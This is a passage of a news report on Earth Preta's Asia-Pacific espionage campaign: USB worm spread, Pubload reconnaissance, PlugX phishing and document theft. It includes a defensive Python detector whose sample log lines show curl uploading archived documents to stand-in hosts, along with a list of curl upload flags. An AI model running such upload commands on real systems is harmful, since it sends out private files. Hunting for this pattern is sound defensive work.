USB Flash Drives Used in Asian Government Attacks

The Earth Preta hacker group has launched a campaign targeting government institutions in the Asia-Pacific region (APR). According to Trend Micro’s data, the attackers have updated their tactics and employed new malicious programs in their attacks.

One of the key components of the attacks is a modified version of the Hiupan worm, which spreads through removable media. The worm delivers the Pubload program, which lets the attackers control infected devices and run commands to collect data and transfer it to their servers.

In the new infection scheme, Hiupan initiates the attack by transferring malicious files to removable media. When the media is connected to a new device, the worm quietly infects it, hiding its files from the user. The updated version of Hiupan features simplified configuration and easier distribution management, with the malicious code stored in the ProgramData directory to evade detection.

The Pubload program’s main objective is to gather system information and map networks. It executes commands to identify active processes, network connections, and device configurations, utilizing both Windows standard utilities and its own data exploration tools.

In addition to the Hiupan worm and Pubload program, two more tools were used in the recent attacks. FDMTP is a tool for loading malicious software that employs encryption to bypass antivirus protection, while PTSocket transfers files to remote servers in multi-threaded mode, speeding up data exfiltration.

The attackers aim to collect documents in various formats, including .doc, .xls, .pdf, and .ppt. Once collected, the files are archived with the RAR program and sent to the Earth Preta servers using the curl command. If curl is not used, the data is transferred using PTSocket.
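Defenders can hunt for this archive-then-upload sequence in process-creation logs. The following Python is an added example, not code from Trend Micro or from the original article; the event records, host names, paths, URLs, the 30-minute window and the inclusion of .docx/.xlsx/.pptx are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from ntpath import basename

# Constructed process-creation records: (host, time, image, command line).
EVENTS = [
    ("WS-01", "2024-01-10T10:00:05", r"C:\Program Files\WinRAR\Rar.exe",
     r"rar.exe a -r C:\ProgramData\stage\out.rar D:\*.doc D:\*.pdf"),
    ("WS-01", "2024-01-10T10:03:40", r"C:\Windows\System32\curl.exe",
     r"curl.exe -T C:\ProgramData\stage\out.rar ftp://203.0.113.10/in/"),
    ("WS-02", "2024-01-10T11:00:00", r"C:\Program Files\WinRAR\Rar.exe",
     r"rar.exe a C:\Backup\photos.rar C:\Pictures\*.jpg"),
    ("WS-03", "2024-01-10T09:00:00", r"C:\Program Files\WinRAR\Rar.exe",
     r"rar.exe a C:\Temp\q.rar C:\Docs\*.xls"),
    ("WS-03", "2024-01-10T12:30:00", r"C:\Windows\System32\curl.exe",
     r"curl.exe --upload-file C:\Temp\q.rar https://example.com/u"),
]
# Formats named in the article; the trailing "x" variants are an added assumption.
DOC_EXT = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\b", re.I)
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "--data-binary"}  # curl upload options
WINDOW = timedelta(minutes=30)  # assumed correlation window

def staged_archive(image, cmdline):
    """Return the .rar path if this is a RAR 'a' (add) command over document files."""
    tok = [t.strip('"') for t in cmdline.split()]
    if basename(image).lower() not in ("rar.exe", "winrar.exe") or "a" not in tok[1:]:
        return None
    rars = [t for t in tok if t.lower().endswith(".rar")]
    has_docs = any(DOC_EXT.search(t) for t in tok)
    return rars[0] if rars and has_docs else None

def uploaded_archive(image, cmdline):
    """Return the .rar path that a curl command uploads, else None."""
    tok = [t.strip('"') for t in cmdline.split()]
    if basename(image).lower() != "curl.exe" or not UPLOAD_FLAGS & set(tok):
        return None
    rars = [t.split("@")[-1] for t in tok if t.lower().endswith(".rar")]
    return rars[0] if rars else None

def find_stage_then_upload(events):
    """Pair a document-archiving event with a later curl upload of the same file on the same host."""
    staged, hits = {}, []
    for host, ts, image, cmd in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        rar, up = staged_archive(image, cmd), uploaded_archive(image, cmd)
        if rar:
            staged[(host, rar.lower())] = when
        key = (host, up.lower()) if up else None
        if key in staged and when - staged[key] <= WINDOW:
            hits.append((host, up, staged[key].isoformat(), ts))
    return hits
```

On the constructed events only WS-01 is reported: WS-02 archives no document formats, and the WS-03 upload falls outside the window.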

Recent attacks have also featured phishing campaigns, in which the hackers sent malicious emails with links that led to the download of a loader, which delivered the PlugX backdoor to provide long-term access to the victim’s system.

An analysis of phishing emails and printed documents revealed that state institutions related to defense, foreign policy, and education in Asia-Pacific countries were the primary targets of Earth Preta. Victims included institutions from Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan.

Earth Preta continues to enhance its tools and attack methods, posing a significant threat to government and corporate structures in the Asia-Pacific region. Their use of removable media to spread malware, phishing emails for initial infection, and innovative data exfiltration techniques demonstrate the group’s
